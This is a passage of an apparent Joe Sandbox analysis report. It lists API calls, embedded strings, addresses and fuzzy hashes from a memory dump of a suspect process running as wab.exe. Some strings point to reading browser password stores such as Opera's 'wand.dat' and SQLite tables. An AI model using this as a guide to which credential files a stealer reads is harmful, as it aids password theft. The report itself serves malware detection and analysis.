                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                  • GetLastError.KERNEL32 ref: 0041810A
                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$CloseCreateErrorHandleLastMappingView
                  • String ID:
                  • API String ID: 1661045500-0
                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                  APIs
                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                  • memcpy.MSVCRT ref: 0042EC7A
                  Strings
                  • virtual tables may not be altered, xrefs: 0042EBD2
                  • sqlite_altertab_%s, xrefs: 0042EC4C
                  • Cannot add a column to a view, xrefs: 0042EBE8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                  • API String ID: 1297977491-2063813899
                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                  APIs
                  • memset.MSVCRT ref: 0040560C
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                  • String ID: *.*$dat$wand.dat
                  • API String ID: 2618321458-1828844352
                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                  APIs
                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                  • wcslen.MSVCRT ref: 00410C74
                  • _wtoi.MSVCRT ref: 00410C80
                  • _wcsicmp.MSVCRT ref: 00410CCE
                  • _wcsicmp.MSVCRT ref: 00410CDF
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                  • String ID:
                  • API String ID: 1549203181-0
                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                  APIs
                  • memset.MSVCRT ref: 00412057
                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                  • GetKeyState.USER32(00000010), ref: 0041210D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                  • String ID:
                  • API String ID: 3550944819-0
                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                  APIs
                  • wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                  • memcpy.MSVCRT ref: 0040A94F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocwcslen
                  • String ID:
                  • API String ID: 3023356884-0
                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                  APIs
                  • wcslen.MSVCRT ref: 0040B1DE
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                  • memcpy.MSVCRT ref: 0040B248
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocwcslen
                  • String ID:
                  • API String ID: 3023356884-0
                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: @
                  • API String ID: 3510742995-2766056989
                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                  APIs
                  • strlen.MSVCRT ref: 0040B0D8
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                  • memcpy.MSVCRT ref: 0040B159
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocstrlen
                  • String ID:
                  • API String ID: 1171893557-0
                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                  APIs
                  • memset.MSVCRT ref: 004144E7
                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                  • memset.MSVCRT ref: 0041451A
                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                  • String ID:
                  • API String ID: 1127616056-0
                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: sqlite_master
                  • API String ID: 438689982-3163232059
                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                  APIs
                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                  • wcscpy.MSVCRT ref: 00414DF3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: BrowseFolderFromListMallocPathwcscpy
                  • String ID:
                  • API String ID: 3917621476-0
                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                  APIs
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                  • _snwprintf.MSVCRT ref: 00410FE1
                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  • _snwprintf.MSVCRT ref: 0041100C
                  • wcscat.MSVCRT ref: 0041101F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                  • String ID:
                  • API String ID: 822687973-0
                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                  APIs
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                  • malloc.MSVCRT ref: 00417459
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7556DF80,?,0041755F,?), ref: 00417478
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@malloc
                  • String ID:
                  • API String ID: 4284152360-0
                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                  • RegisterClassW.USER32(?), ref: 00412428
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule$ClassCreateRegisterWindow
                  • String ID:
                  • API String ID: 2678498856-0
                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                  APIs
                  • GetDlgItem.USER32(?,?), ref: 00409B40
                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$Item
                  • String ID:
                  • API String ID: 3888421826-0
                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                  APIs
                  • memset.MSVCRT ref: 00417B7B
                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                  • GetLastError.KERNEL32 ref: 00417BB5
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ErrorLastLockUnlockmemset
                  • String ID:
                  • API String ID: 3727323765-0
                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                  APIs
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                  • malloc.MSVCRT ref: 00417407
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@malloc
                  • String ID:
                  • API String ID: 4284152360-0
                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                  APIs
                  • memset.MSVCRT ref: 0040F673
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                  • strlen.MSVCRT ref: 0040F6A2
                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                  APIs
                  • memset.MSVCRT ref: 0040F6E2
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                  • strlen.MSVCRT ref: 0040F70D
                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                  APIs
                  • memset.MSVCRT ref: 00402FD7
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                  • strlen.MSVCRT ref: 00403006
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                  • String ID:
                  • API String ID: 2754987064-0
                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                  APIs
                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                  • GetStockObject.GDI32(00000000), ref: 004143C6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                  • String ID:
                  • API String ID: 764393265-0
                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                  APIs
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Time$System$File$LocalSpecific
                  • String ID:
                  • API String ID: 979780441-0
                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                  APIs
                  • memcpy.MSVCRT ref: 004134E0
                  • memcpy.MSVCRT ref: 004134F2
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$DialogHandleModuleParam
                  • String ID:
                  • API String ID: 1386444988-0
                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
